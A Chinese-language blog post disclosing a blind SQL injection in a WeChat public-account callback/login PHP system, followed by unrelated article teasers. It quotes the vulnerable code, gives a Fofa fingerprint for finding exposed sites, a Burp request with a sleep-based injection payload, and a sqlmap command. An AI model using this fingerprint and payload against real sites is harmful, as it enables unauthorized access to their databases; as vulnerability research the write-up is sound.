:
微信公众号无限回调系统SQL注入漏洞
2024年07月14日 14:04
微信公众平台无限回调系统是一个适用于H5游戏,H5网站,一切需要公众号登录接口的H5网站,且附带登录注册功能.
Fofa关键词:
Fofa:"mb-5 web-font-desc"
漏洞分析
在 /user/ajax.php 中的使用$_REQUEST传参 act 来调用不同接口,我们来看一下 siteadd 接口
<?php
if (!$_REQUEST['act']) jsonShow('0', '参数错误');
$mod = 'user';
$notLogin = true;
require_once '../includes/common.php';
$act = $_REQUEST['act'];
switch ($act) {
......
case 'siteadd':
if ($userData['userMoney'] < $authPrice) jsonShow(0, '余额不足');
$urlData = $userClass->GetUrl($_POST['siteUrl']); //这里进入了GetUrl方法
if (!empty($urlData)) jsonShow(0, '站点已授权');
$_POST['siteStopTime'] = str_replace('T', ' ', $_POST['siteStopTime']);
$_POST['siteAddTime'] = date('Y-m-d H:i:s');
$codeData = explode('|', $_POST['code']);
unset($_POST['code']);
$_POST['codeId'] = $codeData['0'];
$_POST['codeName'] = $codeData['1'];
$_POST['siteState'] = $codeData['2'];
$_POST['userName'] = $_SESSION['userName'];
$_POST['siteCode'] = md5(uniqid() . mt_rand());
$upData = false;
$upStatusData = $userClass->GetUpStatus($userData['statusCode'], $userData['userUseMoney'] + $authPrice);
if (!empty($upStatusData)) $upData = $upStatusData['0'];
if (!$userClass->AddSite($_POST, $authPrice, $upData)) jsonShow(0, '未知错误');
jsonShow('1', '添加成功');$urlData 变量被赋值为 GetUrl($_POST['siteUrl']); 这里直接使用POST传入,且未有任何过滤 咱们追踪一下
最终在 /includes/class/user.class.php 中,咱们找到了GetUrl方法
public function GetUrl($url)
{
return $this->DB->query("SELECT * FROM `auth_site` WHERE `siteUrl` = '$url'")->fetch(PDO::FETCH_ASSOC);
}这里很明显地看到被传入进去地 $url 被直接带入到了SELECT 查询中,很明显这里就是一处SQL盲注.
漏洞复现测试
使用burp post提交
POST /user/ajax.php?act=siteadd HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 27
siteUrl=';select sleep(5)#'
使用sqlmap进行注入
python sqlmap.py -r a.txt --level=3 --dbms=mysql
本文地址: http://www.shuzixingkong.net/article/10
这是因为windows下的php集成环境使用的是fastcgi模式来运行的php,所以不会生效。需要更换代码
Win32 RegGetValue函数获取注册表信息ERROR_MORE_DATA错误代码234
主域名也叫顶级域名、顶级域、是不带任何前缀字符的,是在域名注册商提交注册的域名。如:shuzixingkong.net这就是主域名。之所以很多人都用www开头的这是跟以前的互联网环境有关,以前可能一个域名会支持多种服务,比如ftp服务,很多人就用ftp.shuzixingkong.net 而www就是万维网服务,所以访问网站大多数都是用的www.shuzixingkong.net从而造成现在的混淆。
今日OpenSSH又来新漏洞了,只影响Linux服务器,windows服务器不必担心。本文含有检测漏洞是否存在的pyhton脚本
用MFC开发的软件,生成后默认的软件图标是一个MFC三个字母。自己开发的软件很有必要修改为自己的图标。
发卡宝卡密寄售系统存在SQL注入漏洞,漏洞产生于/shop/alipay_notify.php 文件中,post参数直接传入out_trade_no,没有进行任何过滤,并且直接拼接SQL语句进行查询,导致前台SQL注入
定义 工厂方法模式是一种创建型设计模式,它定义了一个用于创建对象的接口,但由子类来决定实例化哪一个类。工厂方法使得类的实例化延迟到子类,这样可以让客户端在不需要知道具体类的情况下创建对象。工厂方法模式通过使用继承和多态性,允许子类来控制对象的创建方式,能够更好地应对对象创建的复杂性和变化性。 为什么
光猫在家里只能担当拨号上网的角色吗?不,稍加改造就是一台NAS!
在这里,使用natmap映射IPV4,使用nginx+njs+vList5打造在线文件预览+管理,使用nginx+davext实现远程文件管理
甚至还可以使用aria2下载磁力做下载器,使用clash让光猫变成真的猫!只要你敢想,光猫
